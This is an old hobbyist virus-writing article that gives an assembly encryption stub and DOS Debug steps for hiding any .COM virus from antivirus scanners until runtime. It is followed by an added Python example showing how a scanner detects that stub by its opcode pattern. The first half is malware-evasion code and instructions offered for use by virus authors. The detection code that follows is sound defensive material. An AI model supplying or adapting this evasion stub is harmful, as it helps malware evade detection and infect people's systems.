Protecting Your Virus from Evil Detectors
by Dr. Bloodmoney
Before learning assembler, I found the subject of virii to be about the most boring subject I could think of. But it caught my attention when I started to think about how I could sneak a virus (any virus) by a scanning program such as McAfee's. Here is a simple piece of code I came up with that can be attached to any virus that has been written in assembly language (in the .COM format). It keeps the virus encrypted until runtime (i.e. until it is too late).
Add the following code to the virus of your choice at the beginning of the program:
encryption_code:
        mov     bx,offset start_of_virus
encryption_loop:
        mov     ah,[bx]                 ;Take first byte of virus and put in AH
        sub     ah,01                   ;This can be any integer up to FF
        mov     [bx],ah                 ;Move changed byte back into virus code
        inc     bx                      ;Move to next byte of virus
        cmp     bx,offset end_virus     ;Are we done yet?
        jb      encryption_loop         ;Nope, keep going
        nop                             ;Breakpoint for Debug
start_of_virus:
        '
        '                               ;Viral code
        '
end_virus:
        nop                             ;Add this label and NOP to the end of the virus code
        end     encryption_code

After you compile the virus into .COM format, take it into Debug:
C:\> debug virus.com

Use the "R" command to display the registers and take particular note of CX. After the virus has been encrypted, the actual size of the file may differ from CX; this is why we placed the NOP at the end of the file.
Now run the program with a breakpoint at the first NOP (i.e. G 0111). This runs just the encryption portion of the code and exits back to Debug.
Unassemble the code with "U" to verify that the virus has been encrypted. You should notice a big change at this point.
Restore all registers to their original values, but first find the address of the NOP we placed at the end of the file and put that address into CX.
Finally, change the "sub ah,01" in encryption_code: to "add ah,01".
Save the file ("W") and exit ("Q").
You now have a virus that will avoid detection until runtime. When run, the "add ah,01" restores the original viral code, putting it into action.
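What the scanner's side of this looks like, as an added example that is not part of the original article: the loop above is a fixed byte sequence, so a scanner does not need to recognise the encrypted body at all. It matches the stub itself, reads the key and the start/end offsets straight out of the immediates, undoes the transform the way the stub would at runtime, and runs its normal signatures over the result (the classic "x-ray" scan). The Python check below does exactly that against a constructed .COM image; the 8086 opcode encodings are real, while the sample body, key and layout are made up for the example.

```python
"""Static check for the add/sub-by-constant decryptor loop described above.

Added example, not code from the original article. Opcode encodings follow
the 8086 instruction set; the sample image is constructed for this example
and carries no real virus body.
"""
import math
import re
from collections import Counter

ORG = 0x100  # a .COM image is loaded at CS:0100

# The one-byte-at-a-time add/sub loop from the article, with wildcards for
# everything the author can vary: start address, key, end address, jump displacement.
STUB_RE = re.compile(
    rb"\xbb(?P<start>..)"                 # mov bx, imm16      (start_of_virus)
    rb"\x8a\x27"                          # mov ah,[bx]
    rb"\x80(?P<op>[\xec\xc4])(?P<key>.)"  # sub ah,imm8 (80 EC) / add ah,imm8 (80 C4)
    rb"\x88\x27"                          # mov [bx],ah
    rb"\x43"                              # inc bx
    rb"\x81\xfb(?P<end>..)"               # cmp bx, imm16      (end_virus)
    rb"\x72(?P<disp>.)",                  # jb rel8            (back to the loop)
    re.DOTALL,
)


def find_decryptor(image: bytes):
    """Return the stub's parameters if the loop is present and consistent, else None."""
    for m in STUB_RE.finditer(image):
        start = int.from_bytes(m["start"], "little")
        end = int.from_bytes(m["end"], "little")
        disp = int.from_bytes(m["disp"], "little", signed=True)
        # The jb must land on the 'mov ah,[bx]' three bytes into the match.
        if ORG + m.end() + disp != ORG + m.start() + 3:
            continue
        # The bounds must describe a region inside the file, after the stub.
        if not (ORG + m.end() <= start < end <= ORG + len(image)):
            continue
        return {
            "stub_offset": m.start(),
            "op": "add" if m["op"] == b"\xc4" else "sub",
            "key": m["key"][0],
            "start": start,
            "end": end,
        }
    return None


def recover_body(image: bytes, info: dict) -> bytes:
    """Apply the stub's own byte transform to the region it covers, as it would at runtime."""
    lo, hi = info["start"] - ORG, info["end"] - ORG
    k = info["key"]
    if info["op"] == "add":
        return bytes((b + k) & 0xFF for b in image[lo:hi])
    return bytes((b - k) & 0xFF for b in image[lo:hi])


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the region; shown only to make the point that it does not move."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# Constructed test image: the article's stub (with the add ah,01 already swapped in),
# the Debug breakpoint NOP, a 4-byte "body" stored minus 1, and the trailing NOP.
SAMPLE_IMAGE = bytes([
    0xBB, 0x12, 0x01,        # mov bx,0112h
    0x8A, 0x27,              # mov ah,[bx]
    0x80, 0xC4, 0x01,        # add ah,01
    0x88, 0x27,              # mov [bx],ah
    0x43,                    # inc bx
    0x81, 0xFB, 0x16, 0x01,  # cmp bx,0116h
    0x72, 0xF2,              # jb 0103h
    0x90,                    # nop (the breakpoint at 0111h)
    0xB3, 0x4B, 0xCC, 0x20,  # stored body: (B4 4C CD 21) minus 1 each, a plain DOS exit call
    0x90,                    # nop at end_virus
])

if __name__ == "__main__":
    found = find_decryptor(SAMPLE_IMAGE)
    print("decryptor:", found)
    if found:
        body = recover_body(SAMPLE_IMAGE, found)
        print("recovered body:", body.hex())
        print("entropy before/after:",
              shannon_entropy(SAMPLE_IMAGE[found["start"] - ORG:found["end"] - ORG]),
              shannon_entropy(body))
```

Two things worth noticing. Changing the key, the labels or the body length does nothing against this check, because every value the author controls is a wildcard in the pattern; the only constant is the instruction sequence itself, which is why scanners of the period keyed on decryptor loops rather than on encrypted bodies. And adding or subtracting a constant modulo 256 is a permutation of byte values, so the entropy of the region is identical before and after the transform; an entropy heuristic would never flag this file, while the stub signature catches it every time.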
I hope you gained something from this article. I realize not everyone is familiar with assembler, but I hope I presented the material in a fashion that everyone could understand.